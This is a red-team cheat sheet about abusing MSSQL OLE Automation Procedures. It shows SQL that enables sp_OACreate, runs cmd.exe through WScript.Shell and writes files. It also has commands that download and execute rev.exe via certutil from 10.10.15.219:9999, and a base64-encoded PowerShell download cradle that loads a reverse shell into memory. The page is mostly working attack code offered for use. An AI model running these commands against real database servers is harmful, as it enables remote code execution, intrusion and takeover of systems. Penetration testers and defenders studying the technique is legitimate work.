Operator On The Wire
Join
← Back to Knowledge Base
RED TEAM / SQL / MSSQL / EXECUTION

OLE-Automation-Procedures

Check

SELECT name,value_in_use FROM sys.configurations WHERE name='Ole Automation Procedures';

-- Enable
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;

EXEC sp_configure 'ole automation procedures', 1;
RECONFIGURE;

Example

DECLARE @objShell INT;
DECLARE @output varchar(8000);

EXEC @output = sp_OACreate 'wscript.shell', @objShell Output;
EXEC sp_OAMethod @objShell, 'run', NULL, 'cmd.exe /c "whoami > C:\Windows\Tasks\tmp.txt"';

File Write & Command Exec

DECLARE @OLE INT EXEC sp_OACreate 'Scripting.FileSystemObject',@OLE OUT EXEC sp_OAMethod @OLE,'CreateTextFile',NULL,'C:\pwned.txt',1;

DECLARE @sh INT,@ret INT;EXEC sp_OACreate 'WScript.Shell',@sh OUT;EXEC sp_OAMethod @sh,'Run',@ret OUT,'cmd.exe /c whoami > C:\ole.txt',0,TRUE;

1. CMD.EXE + BINARY ON DISK

Make a dir, download file and execute

-- Set 
DECLARE @objShell INT; DECLARE @output varchar(8000); EXEC @output = sp_OACreate 'wscript.shell', @objShell Output; EXEC sp_OAMethod @objShell, 'run', NULL, 'cmd.exe /c mkdir C:\tmp';

-- Stage
DECLARE @objShell INT; DECLARE @output varchar(8000); EXEC @output = sp_OACreate 'wscript.shell', @objShell Output; EXEC sp_OAMethod @objShell, 'run', NULL, 'certutil -urlcache -f -split http://10.10.15.219:9999/rev.exe c:\tmp\rev.exe';

-- Execute
DECLARE @objShell INT; DECLARE @output varchar(8000); EXEC @output = sp_OACreate 'wscript.shell', @objShell Output; EXEC sp_OAMethod @objShell, 'run', NULL, 'c:\tmp\rev.exe';

2. PowerShell Reverse Shell in Memory

  • Stage and serve shell.ps1

  • Create command file

echo -n 'IEX (New-Object Net.WebClient).DownloadString("http://10.10.15.219:9999/shell.ps1")' >> command.txt
  • Powershell expects UTF-16LE
iconv -f utf-8 -t utf-16le command.txt > conv.txt
  • Now Base64 to escape bad characters
cat conv.txt | base64 -w0
  • Pass the b64 blob
DECLARE @objShell INT; DECLARE @output varchar(8000); EXEC @output = sp_OACreate 'wscript.shell', @objShell Output; EXEC sp_OAMethod @objShell, 'run', NULL, 'powershell -e SUVYIChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKGh0dHA6Ly8xMC4xMC4xNS4yMTk6OTk5OS9zaGVsbC5wczEiKQ==';